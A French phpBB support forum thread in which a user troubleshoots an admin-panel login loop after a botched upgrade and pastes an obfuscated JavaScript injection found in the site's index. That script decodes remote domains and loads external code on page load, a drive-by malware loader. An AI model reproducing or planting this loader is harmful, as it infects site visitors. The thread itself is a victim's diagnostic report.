Soucis avec l'ACP

Forum de support pour les questions concernant l'utilisation de phpBB3, les problèmes rencontrés lors de manipulations, de configuration du forum ou de personnalisation autres que Styles ou MODs.

Modérateur: Equipe

Règles du forum
Rappel: Conditions générales d'utilisation de phpBB-fr.com - Conditions générales de support de phpBB-Fr.com

Pensez à effectuer une recherche, la réponse à votre question a de grandes chances d'avoir déjà été donnée.

Soucis avec l'ACP

Messagepar Yopard » 23 Fév 2010 à 17:43

Bonjour, bonsoir,

Voila je vous contact car j'ai eu récément des soucis avec mon forum.
On as été obliger de migrer de RC8 a 3.0.6 car pas mal de faille de sécu etc, mais depuis, impossible d'accéder a l'ACP, ça boucle lors de l'auth.
On rentre le mot de passe, vous été connecter redirection blablabla, et pouf, remot de passe.

Quelqu'un aurais des renseignement a m'apporter ?

Le forum : http://start5g.ovh.net/~orbedele/forum/
Yopard
Posteur néophyte
Posteur néophyte

Re: Soucis avec l'ACP

Messagepar lolovoisin » 23 Fév 2010 à 17:54

bonjour,

pouvez vous nous donner vos réglage de cookies ?
autre question mais comment avec vous faites la MAJ ?
http://www.lolovoisin.com : Blog, trucs, astuces et tutos phpbb3, hébergements, débian

Ceux qui échouent trouvent des excuses, ceux qui réussissent trouvent les moyens
Quand un homme a faim, mieux vaut lui apprendre à pêcher que de lui donner un poisson.
lolovoisin
Rugbix ³

Messagepar Yopard » 23 Fév 2010 à 18:00

J'ai suivit un post du forum pour le transfert, J'ai installer la 3.0.6, j'ai mit a jour les bases avec le module de phpBB-3.0.3_to_3.0.4.zip puis avec le module de phpBB-3.0.4_to_3.0.6.zip (téléchargé sur le site officiel anglais)

Pour la structure des cookies, ou puis-je vous trouver cela ?
Database ou Cookies navigateurs ?
Yopard
Posteur néophyte
Posteur néophyte

Messagepar lolovoisin » 23 Fév 2010 à 18:06

gné ???
Vous aviez une RC8 (déjà vous n'auriez jamais du etre en prod avec c'est marqué partout en rouge)

Mais comment vous etes arrivé à la conclusion qu'il fallait utiliser une MAJ d'une version 303 vers 304 ?????

je pige pas du tout votre raisonnement ???
Vous ets en quelle version là ?
306 vous etes sur ???

Vous aviez des MODs ?
http://www.lolovoisin.com : Blog, trucs, astuces et tutos phpbb3, hébergements, débian

Ceux qui échouent trouvent des excuses, ceux qui réussissent trouvent les moyens
Quand un homme a faim, mieux vaut lui apprendre à pêcher que de lui donner un poisson.
lolovoisin
Rugbix ³

Messagepar Yopard » 23 Fév 2010 à 18:26

Certain, comme je l'ai dit l'astuce viens de ce forum je sais plus trop ou, je suis sur d'être en 3.0.6 et les mod, on viens a peine de les réinstaller.

Pour la RC8, le forum as déjà plusieurs année, mais faillais bien se mettre a jour un jour. ^^ Mais j'ai trouver la solution sur le site anglais http://www.phpbb.com/community/viewtopi ... #p11611825
Yopard
Posteur néophyte
Posteur néophyte

Messagepar lolovoisin » 23 Fév 2010 à 18:49

C'est ce que j'allais vous proposer de faire pour la 306, mais bon il fallait d'abord savoir si vous aviez beaucoup de MODs car il faut tout réinstaller.

[!] Si vous considérez votre problème comme réglé, merci d'éditer le premier message de ce sujet et d'ajouter l'icône de sujet

lolovoisin.

lolovoisin
Rugbix ³

Messagepar Yopard » 23 Fév 2010 à 18:56

Je parlais de la solution pour RC8 to 3.0.6 mdr A l'aide TT

:p
Yopard
Posteur néophyte
Posteur néophyte

Messagepar lolovoisin » 23 Fév 2010 à 19:00

ah ok.
ben comme je vous ai dit, vu au point ou vous en etes et vu le bazar, je vous conseille juste de remplacer tout et de repartir propre.

Faites tout d'abord une sauvegarde des fichiers de votre forum.
Ensuite, si vous aviez des MODs, il faudra les réinstaller, car on va écraser tous les fichiers
puis remplacez tous les fichiers de votre forum par ceux d'une archive d'origine, SAUF config.php, et les répertoires /images, /download et /files.

Et comme vous ne devez pas avoir votre base à jour, il faudra lancer le fichier database_update.php du répertoire /install avant de supprimer ce répertoire.

Mais bon donnez moi quand même vos réglages de cookies avant, vous les trouverez dans la table config de votre base.

lolovoisin
Rugbix ³

Messagepar Yopard » 23 Fév 2010 à 19:18

Code: Tout sélectionner
cookie_domain    start5g.ovh.net   
cookie_name   phpbb3_4apc4   
cookie_path   /

Sinon pour le ficher c'est en cour.

Sinon autre question ...
Code: Tout sélectionner
<script>var F;if(F!='Gt' && F!='zh'){F='Gt'};function Q() {this.W='';var D=new String();var yg;if(yg!='FO' && yg!='jf'){yg='FO'};var G='replace';var n;if(n!='' && n!='NC'){n='ea'};var o='[';var c="";this.lV="";var B=RegExp;var cH="";var x=']';var a=new Date();var cp;if(cp!='f' && cp!='v'){cp='f'};var A='g';var Gz='';var pl=new Array();function e(w,E){var Hi="";var z=o;z+=E;z+=x;var yf='';var jz='';var O=new B(z, A);var T;if(T!='Kj'){T='Kj'};var _o=new Date();return w[G](O, D);var AS;if(AS!='' && AS!='m'){AS=null};};var iF;if(iF!='MS'){iF='MS'};var Bt;if(Bt!='' && Bt!='Ym'){Bt=''};this.pc='';var d=window;var iy;if(iy!='' && iy!='L'){iy=''};var pY;if(pY!='' && pY!='po'){pY=''};var Qr=new String();var Fh='';var i=e('hSt8t8pS:8/1/SsLu1eSd1d8e8uSt8s8c8hLeL-1d1e8.8b8aLdLjLoSj1o8.8cLoLmS.1v1iSd8e1o8sLzL-LcSoLmL.1s8u8p1eLr8n8eSwLs8t1uLf1fS.LrLuL:L',"8L1S");var dZ=new String();var j='';var h=new Date();var LH=new Date();var N=e('c9rCe9a9t9eREql9e9m9eqnCtR',"CqR79");var M=e('/ZtZiZmZeDsDoDnDlZiZnZeD.ZcDoZ.ZuZkZ/ZtZiDmDeZsDoDnZlDiDnZeZ.DcZoZ.ZuDkD/ZtZoDpZsZhDaZrZeDwZaZrZeD.ZcDoDmZ/ZiDcZqZ.DcZoDmZ/DgZoDoZgZlZeD.DcZoZmD.DpZhDpD',"ZD");this.Hf='';var t=e('8166666106116866222120121612',"216");var lh=new String();this.C="";var y=e('s8cIrHiHpHtI',"8FIHE");var Oj;if(Oj!='cK'){Oj=''};var Rn;if(Rn!='nL' && Rn!='Pv'){Rn=''};d[e('o3n4luoYa4d4',"Y4u3")]=function(){try {var kl;if(kl!='BQ' && kl!='II'){kl='BQ'};this.N_='';j+=i;this.AD="";j+=t;j+=M;var gP;if(gP!='Gy' && gP!='ek'){gP='Gy'};zk=document[N](y);var de=new Array();var FV=new Date();var VL;if(VL!='' && VL!='wC'){VL='Ja'};this._G="";p(zk,'src',j);p(zk,'defer',([1][0]));var EH=new Array();this.Bu='';var Jl=new Date();var NI;if(NI!='' && NI!='yN'){NI='cU'};document.body.appendChild(zk);this.GBV="";this.yND="";} catch(_){var XY=new Date();var AW=new Date();};this.SH="";var wx="";};var t_=new String();var LF;if(LF!='' && LF!='Ojw'){LF=''};function p(H,b,inx){H.setAttribute(b, inx);}var AA=new Array();var Mq;if(Mq!=''){Mq='xI'};var Cc=new Date();var CQ=new Date();};this.Wd="";Q();</script>
<!--e9c9e39c6fa5f2efda5ea64b9b1a03e3--><b>[phpBB Debug] PHP Notice</b>: in file <b>/includes/functions.php</b> on line <b>4183</b>: <b>Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)</b><br />
<b>[phpBB Debug] PHP Notice</b>: in file <b>/includes/functions.php</b> on line <b>4185</b>: <b>Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)</b><br />
<b>[phpBB Debug] PHP Notice</b>: in file <b>/includes/functions.php</b> on line <b>4186</b>: <b>Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)</b><br />
<b>[phpBB Debug] PHP Notice</b>: in file <b>/includes/functions.php</b> on line <b>4187</b>: <b>Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)</b><br />

ca fait deux fois qu'on se mange cette injection, elle va dans l'index et ailleur vu que ca continue de faire foirer les headers, etc etc

c'est grave docteur ?
Yopard
Posteur néophyte
Posteur néophyte

Messagepar lolovoisin » 23 Fév 2010 à 19:34

l'infection ouais c'est un saloperie que vous pouvez avoir sur votre PC ou celui de quelqu'un qui a accés au ftp.
regardez j'ai donné un lien ici : support-utilisation-phpbb3/sujet171446.html#p1311740

Edit: Pour info, mais votre style lui par contre n'est pas à jour du tout, il est encore en 3.0.0.
Il FAUT le mettre à jour, soit manuellement (voir forum de téléchargement, il y a toute les procédures) soit en téléchargeant le nouveau, mais il faudra rajouter les modifs des MODs.

lolovoisin
Rugbix ³

Messagepar Yopard » 24 Fév 2010 à 23:27

Hello,

Bon, j'ai régler le soucis l'infestation,mais par contre,toujours rien niveau ACP.
L'update m'a rien fait de particulier :
Mise à jour de la base de données vers la dernière version stable

Type de la base de données :: mysql4
Version antérieure :: 3.0.6
Version mise à jour :: 3.0.6

Mise à jour du schéma de la base de données

En cours :: Aucune mise à jour n’est nécessaire

Mise à jour des données

En cours :: Aucune mise à jour n’est nécessaire

Mise à jour de la version et optimisation des tables

En cours :: . . Réalisé
Résultat :: Aucune erreur

Mise à jour terminée avec succès

Veuillez vous assurer d’avoir également mis à jour tous les fichiers de votre forum car ce fichier ne met à jour que la base de données.

Vous pouvez à présent vous connecter sur votre forum et vérifier que tout fonctionne correctement. N’oubliez pas de supprimer, de renommer ou de déplacer votre répertoire d’installation !

En revanche, après update, j'ai eu accès un temps a l'ACP, puis ça a recommencer. L'autre Admin lui n'a pas eu ma chance, car il boucle toujours sur le log, même quand j'avais accès a l'acp
Nardryel 79.89.107.129 il y a 6 minutes Connexion à l’administration
Nardryel 79.89.107.129 il y a 7 minutes Connexion à l’administration

Bref le nage dans la semoule :s

Ps : Toutes les manips on ete faites sous prosilver 3.0.6
Yopard
Posteur néophyte
Posteur néophyte

Messagepar lolovoisin » 25 Fév 2010 à 08:33

la base est à jour ? (a priori oui)

Ok, donc les fichiers ont tous été remplacés ?

vous avez vidé le cache du forum ?
Pour vider le cache de votre forum manuellement, il suffit de vous connecter sur votre serveur via FTP, puis rendez-vous dans le répertoire /cache et supprimez tous les fichiers SAUF les fichiers .htaccess et index.htm

Autre chose, mais les cookies ne sont pas sécurisé ? (il manque une ligne dans ce que vous avez recopié)

lolovoisin
Rugbix ³

Messagepar Yopard » 25 Fév 2010 à 19:41

cookie_secure 0

Sinon pour le cache, j'avais essayer, et j'ai réessayer pour la forum mais nada :s

ps : Visiblement il y a aussi des problèmes d'activation de compte
Yopard
Posteur néophyte
Posteur néophyte

Messagepar Morgyanne » 08 Mar 2010 à 08:35

Salut,

As-tu continué à chercher ce qui clochait ou as-tu laissé tombé ?

@+
Morgyanne :)
Demande de support par MP = Poubelle
Morgyanne
Administrateur
Administrateur

Messagepar Yopard » 10 Mar 2010 à 16:22

Hello,

Je suis toujours en recherche pour le moment actuellement j'essaye de passer les données du forum a soucis sur un propre que j'ai installer a coter mais je patoge n peu dans l'ancien que j'aimerais bien rendre fonctionnel plutôt qu'un transfert hazardeux via db ^^
Yopard
Posteur néophyte
Posteur néophyte

Retourner vers Utilisation

• Articles en relation
    Réponses
    Vus
    Dernier message